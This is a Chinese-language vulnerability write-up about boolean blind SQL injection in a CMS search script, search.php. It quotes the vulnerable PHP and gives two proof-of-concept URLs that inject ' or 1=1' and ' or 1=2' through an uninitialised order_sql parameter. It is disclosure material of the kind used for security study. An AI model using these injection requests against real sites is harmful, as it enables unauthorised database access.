VULHUB ™

漏洞文件:/search/search.php ``` }else{ $module=intval($module); if($class1)$module=0; if(intval($module)){ $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' "; }else{ $class1_info=$class_list[$class1]; if(!$class1_info)okinfo('../',$pagelang[noid]); $class1sql=" class1='$class1' "; $class2sql=" class2='$class2' "; $class3sql=" class3='$class3' "; if($_GET['class1re']){ $class1re = ''; } if($class1&&!$class2&&!$class3){ foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){ if($val['releclass']==$class1){ $class1re.=" or class1='$val[id]' "; } } if($class1re){ $class1sql='('.$class1sql.$class1re.')'; } } if($class_list[$class2]['releclass']){ $class1sql=" class1='$class2' "; $class2sql=" class2='$class3' "; $class3sql=""; } $serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql "; if($class2&&$class2sql)$serch_sql .= " and $class2sql "; if($class3&&$class3sql)$serch_sql .= " and $class3sql...

漏洞文件:/search/search.php ``` }else{ $module=intval($module); if($class1)$module=0; if(intval($module)){ $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' "; }else{ $class1_info=$class_list[$class1]; if(!$class1_info)okinfo('../',$pagelang[noid]); $class1sql=" class1='$class1' "; $class2sql=" class2='$class2' "; $class3sql=" class3='$class3' "; if($_GET['class1re']){ $class1re = ''; } if($class1&&!$class2&&!$class3){ foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){ if($val['releclass']==$class1){ $class1re.=" or class1='$val[id]' "; } } if($class1re){ $class1sql='('.$class1sql.$class1re.')'; } } if($class_list[$class2]['releclass']){ $class1sql=" class1='$class2' "; $class2sql=" class2='$class3' "; $class3sql=""; } $serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql "; if($class2&&$class2sql)$serch_sql .= " and $class2sql "; if($class3&&$class3sql)$serch_sql .= " and $class3sql "; $order_sql=" order by top_ok desc,com_ok desc,no_order desc,updatetime desc,id desc"; } switch($searchtype){ default: if($searchword<>'')$serch_sql.=" and (title like '%$searchword%' or content like '%$searchword%') "; break; case 1: if($searchword<>'')$serch_sql.=" and title like '%$searchword%' "; break; case 2: if($searchword<>'')$serch_sql.=" and content like '%$searchword%' "; break; } $module_name=intval($module)?$module:$class1_info[module]; $module_name=intval($module_name); if($module_name<2||$module_name>9)okinfo('javascript:history.back();',$lang_js1); $table_name="met_".$modulename[$module_name][0]; $table_name=$$table_name; $total_count = $db->counter($table_name, "$serch_sql", "*"); require_once '../include/pager.class.php'; $page = (int)$page; if($page_input){$page=$page_input;} $list_num=$met_search_list; $rowset = new Pager($total_count,$list_num,$page); $from_record = $rowset->_offset(); $page = $page?$page:1; $query = "SELECT * FROM $table_name $serch_sql $order_sql LIMIT $from_record, $list_num"; ``` 问题参数 $order_sql 他赋值的位置在 ``` }else{ $class1_info=$class_list[$class1]; if(!$class1_info)okinfo('../',$pagelang[noid]); $class1sql=" class1='$class1' "; $class2sql=" class2='$class2' "; $class3sql=" class3='$class3' "; if($_GET['class1re']){ $class1re = ''; } if($class1&&!$class2&&!$class3){ foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){ if($val['releclass']==$class1){ $class1re.=" or class1='$val[id]' "; } } if($class1re){ $class1sql='('.$class1sql.$class1re.')'; } } if($class_list[$class2]['releclass']){ $class1sql=" class1='$class2' "; $class2sql=" class2='$class3' "; $class3sql=""; } $serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql "; if($class2&&$class2sql)$serch_sql .= " and $class2sql "; if($class3&&$class3sql)$serch_sql .= " and $class3sql "; $order_sql=" order by top_ok desc,com_ok desc,no_order desc,updatetime desc,id desc"; } ``` 那么我们只需不进入这个条件 进入这个 ``` if(intval($module)){ $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' "; } ``` module参数 可控 只需在2-9即可 **下面用实际的例子来看一下：** 1、访问这个正常的url，构造的语句恒成立： ``` http://www.xxx.com/search/search.php?class1=&class2=&class3=&searchtype=0&searchword=1&lang=cn&module=5&order_sql=%20or%201=1 ```  可以看到上面查询出很多内容。 2、访问不成立的一个url，返回异常的结果： ``` http://www.xxx.com/search/search.php?class1=&class2=&class3=&searchtype=0&searchword=1&lang=cn&module=5&order_sql=%20or%201=2 ```  所以可以看出存在sql的**布尔型**的盲注，所以我们可以通过以下poc进行证明。